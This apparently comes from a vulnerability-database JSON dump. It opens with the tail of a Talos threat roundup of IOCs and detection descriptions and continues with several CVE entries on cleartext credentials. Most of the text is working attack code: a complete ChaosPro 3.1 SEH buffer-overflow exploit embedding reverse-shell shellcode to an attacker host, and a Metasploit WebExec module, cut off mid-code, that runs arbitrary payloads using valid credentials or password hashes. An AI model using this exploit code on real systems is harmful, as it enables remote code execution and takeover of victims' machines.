\n`%ProgramFiles%\\Windows Defender\\MpOAV.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpRTP.dll:!` | 8 \n`%ProgramFiles%\\Windows Defender\\MpSvc.dll:!` | 8 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 1d2d42263d68f09b1946be33971dcc04706ccc597993007b59806c3a23f1ffac 4f59080cc3450aab4dbfae69f1223e79069e3c315bac2df45ea845a68439bcde 559ecb68cce08a6d1d5b27d96295fc81ddc3df2edf1dbf3d765a9831262402c5 907c8629bcd73adf85f6163bacf17831830f0410f7e9840a146b364fb0bb2945 9117e953fe785d1b5c2f350921bd8ec6e14f1e34c0a26059c66c4abfb98e7a55 a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27 b05d35fe02909b09b6a2c347f619430495530617f209ddba7b357db26cd154d1 d038daa7418565e12cd449a5c13d9f36eef7c3cf76c7739db4f41df68649837f e8a06267aade079e638ab09d0ca9b2697079be1292c237846f93bf802d9c8746 ec683faba46071aa2c11667714ee9d1abbbc1b4a6d6d024b77fc97e497eb5673 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-4lFJDJcAbnw/XcWXOsNexPI/AAAAAAAAC6E/Rqxlj5HTIx0eNcQRTj_FcSjvhL_0AFG_gCLcBGAsYHQ/s1600/a026a103b42e4fd2a1b1b21931983d477e53b94210900f2a464cf71dd4868f27_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (47418) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (522) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nProcess hollowing detected \\- (244) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (196) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nInstallcore adware detected \\- (99) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nExcessively long PowerShell command detected \\- (90) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nGamarue malware detected \\- (89) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nFusion adware detected \\- (43) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \nReverse http payload detected \\- (33) \nAn exploit payload intended to connect back to an attacker controlled host using http has been detected. \nDealply adware detected \\- (31) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \n \n", "modified": "2019-11-08T14:31:14", "published": "2019-11-08T14:31:14", "id": "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/C8d5TejfTdU/threat-roundup-1101-1108.html", "type": "talosblog", "title": "Threat Roundup for November 1 to November 8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-12-04T23:56:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-09-02T00:00:00", "published": "2019-09-02T00:00:00", "id": "1337DAY-ID-33189", "href": "https://0day.today/exploit/description/33189", "title": "ChaosPro 3.1 - SEH Buffer Overflow Exploit", "type": "zdt", "sourceData": "#!C:\\Python27\\python.exe\r\n\r\n# Title : ChaosPro 3.1\r\n# Twitter : @securitychops\r\n# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html\r\n\r\n# our egg!\r\npayload = \"T00WT00W\"\r\n\r\n# adjust the stack from 00F2FFA6 to 00F2FFA8\r\npayload += \"\\x83\\xC4\\x02\"\r\n\r\n#the payload\r\npayload += (\r\n# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17 \r\n# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\\x00'\r\n\"\\x89\\xe1\\xdb\\xd7\\xd9\\x71\\xf4\\x5e\\x56\\x59\\x49\\x49\\x49\\x49\\x43\"\r\n\"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58\\x34\"\r\n\"\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42\\x41\\x41\"\r\n\"\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x58\"\r\n\"\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4b\\x58\\x4c\\x42\\x53\\x30\"\r\n\"\\x33\\x30\\x43\\x30\\x55\\x30\\x4b\\x39\\x4b\\x55\\x46\\x51\\x4f\\x30\\x32\"\r\n\"\\x44\\x4c\\x4b\\x56\\x30\\x56\\x50\\x4c\\x4b\\x46\\x32\\x54\\x4c\\x4c\\x4b\"\r\n\"\\x50\\x52\\x45\\x44\\x4c\\x4b\\x34\\x32\\x37\\x58\\x44\\x4f\\x4f\\x47\\x30\"\r\n\"\\x4a\\x36\\x46\\x30\\x31\\x4b\\x4f\\x4e\\x4c\\x47\\x4c\\x45\\x31\\x43\\x4c\"\r\n\"\\x44\\x42\\x56\\x4c\\x47\\x50\\x4f\\x31\\x58\\x4f\\x34\\x4d\\x45\\x51\\x39\"\r\n\"\\x57\\x4b\\x52\\x4c\\x32\\x56\\x32\\x31\\x47\\x4c\\x4b\\x46\\x32\\x32\\x30\"\r\n\"\\x4c\\x4b\\x50\\x4a\\x47\\x4c\\x4c\\x4b\\x30\\x4c\\x32\\x31\\x52\\x58\\x4b\"\r\n\"\\x53\\x31\\x58\\x53\\x31\\x4e\\x31\\x36\\x31\\x4c\\x4b\\x50\\x59\\x37\\x50\"\r\n\"\\x45\\x51\\x58\\x53\\x4c\\x4b\\x47\\x39\\x35\\x48\\x4d\\x33\\x37\\x4a\\x30\"\r\n\"\\x49\\x4c\\x4b\\x57\\x44\\x4c\\x4b\\x53\\x31\\x49\\x46\\x46\\x51\\x4b\\x4f\"\r\n\"\\x4e\\x4c\\x39\\x51\\x58\\x4f\\x54\\x4d\\x45\\x51\\x4f\\x37\\x36\\x58\\x4d\"\r\n\"\\x30\\x33\\x45\\x4a\\x56\\x43\\x33\\x43\\x4d\\x4c\\x38\\x57\\x4b\\x43\\x4d\"\r\n\"\\x56\\x44\\x42\\x55\\x5a\\x44\\x31\\x48\\x4c\\x4b\\x46\\x38\\x31\\x34\\x35\"\r\n\"\\x51\\x4e\\x33\\x35\\x36\\x4c\\x4b\\x34\\x4c\\x30\\x4b\\x4c\\x4b\\x56\\x38\"\r\n\"\\x45\\x4c\\x55\\x51\\x38\\x53\\x4c\\x4b\\x54\\x44\\x4c\\x4b\\x45\\x51\\x38\"\r\n\"\\x50\\x4d\\x59\\x51\\x54\\x46\\x44\\x56\\x44\\x31\\x4b\\x31\\x4b\\x43\\x51\"\r\n\"\\x31\\x49\\x50\\x5a\\x30\\x51\\x4b\\x4f\\x4b\\x50\\x51\\x4f\\x31\\x4f\\x51\"\r\n\"\\x4a\\x4c\\x4b\\x32\\x32\\x4a\\x4b\\x4c\\x4d\\x31\\x4d\\x42\\x48\\x47\\x43\"\r\n\"\\x57\\x42\\x53\\x30\\x55\\x50\\x35\\x38\\x53\\x47\\x43\\x43\\x30\\x32\\x31\"\r\n\"\\x4f\\x31\\x44\\x33\\x58\\x30\\x4c\\x33\\x47\\x57\\x56\\x54\\x47\\x4b\\x4f\"\r\n\"\\x49\\x45\\x48\\x38\\x4a\\x30\\x35\\x51\\x43\\x30\\x35\\x50\\x56\\x49\\x59\"\r\n\"\\x54\\x36\\x34\\x36\\x30\\x52\\x48\\x56\\x49\\x4b\\x30\\x52\\x4b\\x35\\x50\"\r\n\"\\x4b\\x4f\\x59\\x45\\x30\\x50\\x56\\x30\\x56\\x30\\x46\\x30\\x51\\x50\\x36\"\r\n\"\\x30\\x57\\x30\\x46\\x30\\x55\\x38\\x4a\\x4a\\x54\\x4f\\x39\\x4f\\x4b\\x50\"\r\n\"\\x4b\\x4f\\x39\\x45\\x4d\\x47\\x42\\x4a\\x35\\x55\\x52\\x48\\x45\\x5a\\x53\"\r\n\"\\x30\\x33\\x37\\x34\\x51\\x52\\x48\\x45\\x52\\x53\\x30\\x54\\x51\\x31\\x4c\"\r\n\"\\x4d\\x59\\x5a\\x46\\x32\\x4a\\x52\\x30\\x50\\x56\\x46\\x37\\x32\\x48\\x5a\"\r\n\"\\x39\\x59\\x35\\x54\\x34\\x43\\x51\\x4b\\x4f\\x39\\x45\\x4d\\x55\\x49\\x50\"\r\n\"\\x33\\x44\\x44\\x4c\\x4b\\x4f\\x30\\x4e\\x44\\x48\\x43\\x45\\x5a\\x4c\\x35\"\r\n\"\\x38\\x4c\\x30\\x48\\x35\\x4f\\x52\\x36\\x36\\x4b\\x4f\\x49\\x45\\x55\\x38\"\r\n\"\\x52\\x43\\x52\\x4d\\x52\\x44\\x43\\x30\\x4b\\x39\\x4b\\x53\\x56\\x37\\x46\"\r\n\"\\x37\\x31\\x47\\x50\\x31\\x4a\\x56\\x33\\x5a\\x42\\x32\\x51\\x49\\x46\\x36\"\r\n\"\\x4b\\x52\\x4b\\x4d\\x53\\x56\\x4f\\x37\\x51\\x54\\x57\\x54\\x37\\x4c\\x53\"\r\n\"\\x31\\x43\\x31\\x4c\\x4d\\x50\\x44\\x31\\x34\\x34\\x50\\x58\\x46\\x55\\x50\"\r\n\"\\x30\\x44\\x31\\x44\\x30\\x50\\x30\\x56\\x50\\x56\\x50\\x56\\x30\\x46\\x36\"\r\n\"\\x36\\x50\\x4e\\x31\\x46\\x50\\x56\\x50\\x53\\x31\\x46\\x43\\x58\\x52\\x59\"\r\n\"\\x58\\x4c\\x47\\x4f\\x4b\\x36\\x4b\\x4f\\x49\\x45\\x4d\\x59\\x4d\\x30\\x50\"\r\n\"\\x4e\\x30\\x56\\x57\\x36\\x4b\\x4f\\x36\\x50\\x45\\x38\\x44\\x48\\x4c\\x47\"\r\n\"\\x35\\x4d\\x45\\x30\\x4b\\x4f\\x49\\x45\\x4f\\x4b\\x5a\\x50\\x48\\x35\\x59\"\r\n\"\\x32\\x30\\x56\\x42\\x48\\x4e\\x46\\x4a\\x35\\x4f\\x4d\\x4d\\x4d\\x4b\\x4f\"\r\n\"\\x4e\\x35\\x37\\x4c\\x54\\x46\\x53\\x4c\\x54\\x4a\\x4d\\x50\\x4b\\x4b\\x4b\"\r\n\"\\x50\\x52\\x55\\x33\\x35\\x4f\\x4b\\x31\\x57\\x54\\x53\\x54\\x32\\x32\\x4f\"\r\n\"\\x43\\x5a\\x33\\x30\\x31\\x43\\x4b\\x4f\\x4e\\x35\\x41\\x41\"\r\n)\r\n\r\n#badchars\r\n#\\x0a\\x1a\\x3b\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\r\n#\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\r\n#\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\r\n#\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\r\n#\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\r\n#\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\r\n#\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\r\n#\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\r\n\r\n# stack alignment\r\npop_esp = \"\\x5c\"\r\npop_eax = \"\\x58\"\r\npush_eax = \"\\x50\"\r\npush_esp = \"\\x54\"\r\nalign_stack = \"\\x2d\\x8f\\x8e\\x8d\\x8c\\x2d\\x7e\\x68\\x71\\x72\\x2d\\x01\\x01\\x01\\x01\"\r\nzero_eax = \"\\x25\\x7e\\x7e\\x05\\x7e\\x25\\x01\\x01\\x7a\\x01\"\r\n\r\n#this needs to be a backwards jump to give us room to call stack jump code\r\njmpback80 = \"\\x40\\x75\\x80\\x75\"\r\njmpforward06 = \"\\x40\\x75\\x06\\x75\"\r\n\r\n#line containing our payload\r\nline_start = \"Username \"\r\nline_start += payload + \"\\n\"\r\n\r\n#line with our overflow\r\nline_start += \"ProjectPath \"\r\njunk = line_start\r\n\r\n#the buffer starts being overwritten with\r\n# our controlled values at 522\r\njunk += \"A\" * 522\r\n\r\n#junk += alpha_numeric_hex\r\njunk += \"A\" * (1060 - 522 - 126 - 126 - 126 - len(jmpback80) - len(jmpforward06) - len(jmpforward06))\r\n#- 41 - 4 - 41 - 4 - 41 - 4 - 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4- 41 - 4)\r\n\r\n# baby nopsled\r\njunk += \"A\" * 9\r\n\r\n# ok, lets start working stuff here ... we have 126 bytesish ... \r\njunk += zero_eax\r\njunk += push_esp + pop_eax # push esp, pop eax\r\njunk += align_stack\r\njunk += push_eax\r\njunk += pop_esp\r\n\r\n# first section into the stack\r\n# e7 ff e4 75\r\n# good \r\njunk += zero_eax \r\njunk += \"\\x2d\\x89\\x88\\x87\\x86\"\r\njunk += \"\\x2d\\x01\\x8f\\x77\\x8f\"\r\njunk += \"\\x2d\\x01\\x04\\x01\\x02\"\r\njunk += push_eax\r\n\r\n# second section into the stack\r\n# af e7 75 af\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x4f\\x4e\\x4d\\x4c\"\r\njunk += \"\\x2d\\x01\\x39\\x8f\\x02\"\r\njunk += \"\\x2d\\x01\\x03\\x3c\\x01\"\r\njunk += push_eax\r\n\r\n# third section into the stack\r\n# d7 89 57 30\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x8e\\x74\\x73\"\r\njunk += \"\\x2d\\x3e\\x19\\x01\\x8f\"\r\njunk += \"\\x2d\\x03\\x01\\x01\\x26\"\r\njunk += push_eax\r\n\r\n# size for section one\r\njunk += \"A\" * (\r\n\t126\r\n\t- 9 # nopsled\r\n\t\r\n\t# aligning the stack\r\n\t- len(zero_eax) \r\n\t- len(push_esp) \r\n\t- len(pop_eax) \r\n\t- len(align_stack) \r\n\t- len(push_eax) \r\n\t- len(pop_esp) \r\n\t\r\n\t # first set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15 \r\n\t- len(push_eax)\r\n\t\r\n\t # second set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t # third set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\t\t\t\r\n)\r\n\r\n# baby nopslep just for breathing room\r\njunk += \"AAAA\"\r\n# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)\r\njunk += jmpforward06\r\njunk += jmpback80\r\n\r\n#Section Two\r\n\r\n# baby nopsled\r\njunk += \"AAA\" \r\n\r\n# fourth section into the stack part two\r\n# 30 54 b8 ec\r\n# fourth section into the stack part one\r\njunk += zero_eax \r\njunk += \"\\x2d\\x80\\x15\\x75\\x75\"\r\njunk += \"\\x2d\\x80\\x20\\x32\\x35\"\r\njunk += \"\\x2d\\x14\\x11\\x04\\x25\"\r\njunk += push_eax\r\n\r\n# fifth section into the stack\r\n# 74 5a 05 3c\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x8e\\x8d\\x89\"\r\njunk += \"\\x2d\\x34\\x6b\\x17\\x01\"\r\njunk += \"\\x2d\\x01\\x01\\x01\\x01\"\r\njunk += push_eax\r\n\r\n# sixth section into the stack\r\n# 2e cd 58 53\r\n# good \r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x8e\\x8d\\x8c\"\r\njunk += \"\\x2d\\x1d\\x18\\x8e\\x43\"\r\njunk += \"\\x2d\\x01\\x01\\x17\\x01\"\r\njunk += push_eax\r\n\r\n# seventh section into the stack\r\n# 43 43 db 31\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x8e\\x8d\\x8c\"\r\njunk += \"\\x2d\\x3e\\x7f\\x2d\\x2d\"\r\njunk += \"\\x2d\\x02\\x17\\x01\\x03\"\r\njunk += push_eax\r\n\r\njunk += \"A\" * (\r\n\t126 # amount of room before we need to jump\r\n\t\r\n\t- 3 # baby nopsled\r\n\t\r\n\t # part one of fourth set of bytes going onto the stack\r\n\t- len(zero_eax)\t\t\r\n\t\r\n\t# part two of fourth sec of bytes going onto the stack\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t # fifth set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t # sixth set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\r\n\t # seventh set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\t\r\n\t\r\n\t- 4 # baby nopsled\t\t\r\n\t- len(jmpback80)\r\n)\r\n\r\n# Second Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)\r\njunk += jmpforward06\r\njunk += jmpback80\r\n\r\n# baby nopsled\r\njunk += \"AAAA\"\r\n\r\n# eighth section into the stack part two\r\n# 52 42 0f ff\r\n# good\r\n# eighth section into the stack part one\r\njunk += zero_eax \r\njunk += \"\\x2d\\x65\\x65\\x75\\x75\"\r\njunk += \"\\x2d\\x65\\x65\\x25\\x25\"\r\njunk += \"\\x2d\\x37\\x25\\x23\\x13\"\r\njunk += push_eax\r\n\r\n# ninth section into the stack\r\n# ca 81 66 43\r\n# good\r\njunk += zero_eax \r\njunk += \"\\x2d\\x8f\\x81\\x7c\\x7b\"\r\njunk += \"\\x2d\\x2d\\x17\\x01\\x8f\"\r\njunk += \"\\x2d\\x01\\x01\\x01\\x2b\"\r\njunk += push_eax\r\n\r\njunk += \"A\" * (\r\n\t126 # amount of room before we need to jump\r\n\t\r\n\t- len(jmpback80)\r\n\t\r\n\t- 4 # baby nopsled\r\n\r\n\t# eighth set of bytes going onto the stack\r\n\t# eighth section\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\t\r\n\t\r\n\t# ninth set of bytes going onto the stack\r\n\t- len(zero_eax)\r\n\t- 15\r\n\t- len(push_eax)\r\n\t\r\n\t- len(jmpforward06)\r\n)\r\n\r\n# First Jump Backwards 0xFF - 0x80 bytes (0x7F or 127)\r\njunk += jmpforward06\r\njunk += jmpback80\r\n\r\n#seh address for pop, pop and ret with a 0x00 at the end ... \r\njunk += \"\\x5d\\x10\\x40\"\r\n\r\n# write the evil file\r\nwith open('C:\\\\Program Files\\\\ChaosPro3.1\\\\ChaosPro.cfg', 'w') as the_file:\r\n the_file.write(junk)\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33189"}], "cve": [{"lastseen": "2019-10-04T12:26:03", "bulletinFamily": "NVD", "description": "Cleartext Storage of credentials in the iSmartAlarmData.xml configuration file in the iSmartAlarm application through 2.0.8 for Android allows an attacker to retrieve the username and password.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-16222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16222", "published": "2018-11-20T19:29:00", "title": "CVE-2018-16222", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:26:03", "bulletinFamily": "NVD", "description": "Insecure Cryptographic Storage of credentials in com.vestiacom.qbeecamera_preferences.xml in the QBee Cam application through 1.0.5 for Android allows an attacker to retrieve the username and password.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-16223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16223", "published": "2018-11-20T19:29:00", "title": "CVE-2018-16223", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:25:50", "bulletinFamily": "NVD", "description": "An issue was discovered on D-Link DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. The administrative password is stored in plaintext in the /tmp/csman/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-10824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10824", "published": "2018-10-17T14:29:00", "title": "CVE-2018-10824", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:25:50", "bulletinFamily": "NVD", "description": "Synametrics SynaMan 4.0 build 1488 uses cleartext password storage for SMTP credentials.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-10814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10814", "published": "2018-09-14T21:29:00", "title": "CVE-2018-10814", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:25:50", "bulletinFamily": "NVD", "description": "The Ericsson-LG iPECS NMS A.1Ac web application discloses sensitive information such as the NMS admin credentials and the PostgreSQL database credentials to logged-in users via the responses to certain HTTP POST requests. In order to be able to see the credentials in cleartext, an attacker needs to be authenticated.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-10286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10286", "published": "2018-04-22T13:29:00", "title": "CVE-2018-10286", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:26:50", "bulletinFamily": "NVD", "description": "SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-9160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9160", "published": "2018-03-31T21:29:00", "title": "CVE-2018-9160", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-04T12:26:28", "bulletinFamily": "NVD", "description": "An issue was discovered on D-Link DIR-601 B1 2.02NA devices. Being on the same local network as, but being unauthenticated to, the administrator's panel, a user can obtain the admin username and cleartext password in the response (specifically, the configuration file restore_default), which is displayed in XML.", "modified": "2019-10-03T00:03:00", "id": "CVE-2018-5708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5708", "published": "2018-03-30T21:29:00", "title": "CVE-2018-5708", "type": "cve", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:C/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-10-19T11:34:49", "bulletinFamily": "exploit", "description": "This module uses a valid username and password of any level (or password hash) to execute an arbitrary payload. This module is similar to the \"psexec\" module, except allows any non-guest account by default.\n", "modified": "2018-10-24T14:46:00", "published": "2018-10-23T20:51:23", "id": "MSF:EXPLOIT/WINDOWS/SMB/WEBEXEC", "href": "", "type": "metasploit", "title": "WebExec Authenticated User Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Windows XP systems that are not part of a domain default to treating all\n# network logons as if they were Guest. This prevents SMB relay attacks from\n# gaining administrative access to these systems. This setting can be found\n# under:\n#\n# Local Security Settings >\n# Local Policies >\n# Security Options >\n# Network Access: Sharing and security model for local accounts\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::SMB::Client::WebExec\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WebExec Authenticated User Code Execution',\n 'Description' => %q{\n This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.\n },\n 'Author' =>\n [\n 'Ron <ron@skullsecurity.net>',\n ],\n 'License' => MSF_LICENSE,\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 10,\n 'EXITFUNC' => 'thread'\n },\n 'References' =>\n [\n ['URL', 'https://webexec.org'],\n [ 'CVE', '2018-15442' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3072,\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Native upload', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 24 2018'\n ))\n\n register_options(\n [\n # This has to be a full path, %ENV% variables are not expanded\n OptString.new('TMPDIR', [ true, \"The directory to stage our payload in\", \"c:\\\\Windows\\\\Temp\\\\\" ])\n ])\n\n register_advanced_options(\n [\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\n OptInt.new('MAX_LINE_LENGTH', [true, \"The length of lines when splitting up the payload\", 1000]),\n ])\n end\n\n # This is the callback for cmdstager, which breaks the full command into\n # chunks and sends it our way. We have to do a bit of finangling to make it\n # work correctly\n def execute_command(command, opts)\n # Replace the empty string, \"\", with a workaround - the first 0 characters of \"A\"\n command = command.gsub('\"\"', 'mid(Chr(65), 1, 0)')\n\n # Replace quoted strings with Chr(XX) versions, in a naive way\n command = command.gsub(/\"[^\"]*\"/) do |capture|\n capture.gsub(/\"/, \"\").chars.map do |c|\n \"Chr(#{c.ord})\"\n end.join('+')\n end\n\n # Prepend \"cmd /c\" so we can use a redirect\n command = \"cmd /c \" + command\n\n execute_single_command(command, opts)\n end\n\n def exploit\n print_status(\"Connecting to the server...\")\n connect(versions: [2,1])\n\n print_status(\"Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...\")\n smb_login\n\n if not simple.client.auth_user and not datastore['ALLOW_GUEST']\n print_line(\" \")\n print_error(\n \"FAILED! The remote host has only provided us with Guest privileges. \" +\n \"Please make sure that the correct username and password have been provided. \" +\n \"Windows XP systems that are not part of a domain will only provide Guest privileges \" +\n \"to network logins by default.\"\n )\n print_line(\" \")\n disconnect\n return\n end\n\n begin\n if datastore['SMBUser'].to_s.strip.length > 0\n report_auth\n end\n\n # Avoid implementing NTLMSSP on Windows XP\n # http://seclists.org/metasploit/2009/q1/6\n if smb_peer_os == \"Windows 5.1\"\n connect(versions: [1])\n smb_login\n end\n\n wexec(true) do |opts|\n opts[:flavor] = :vbs\n opts[:linemax] = datastore['MAX_LINE_LENGTH']\n opts[:temp] = datastore['TMPDIR']\n opts[:delay] = 0.05\n execute_cmdstager(opts)\n end\n handler\n disconnect\n end\n\n end\n\n def report_auth\n service_data = {\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\n port: datastore['RPORT'],\n service_name: 'smb',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n private_data: datastore['SMBPass'],\n username: datastore['SMBUser'].downcase\n }\n\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\n credential_data.merge!({\n realm_key: 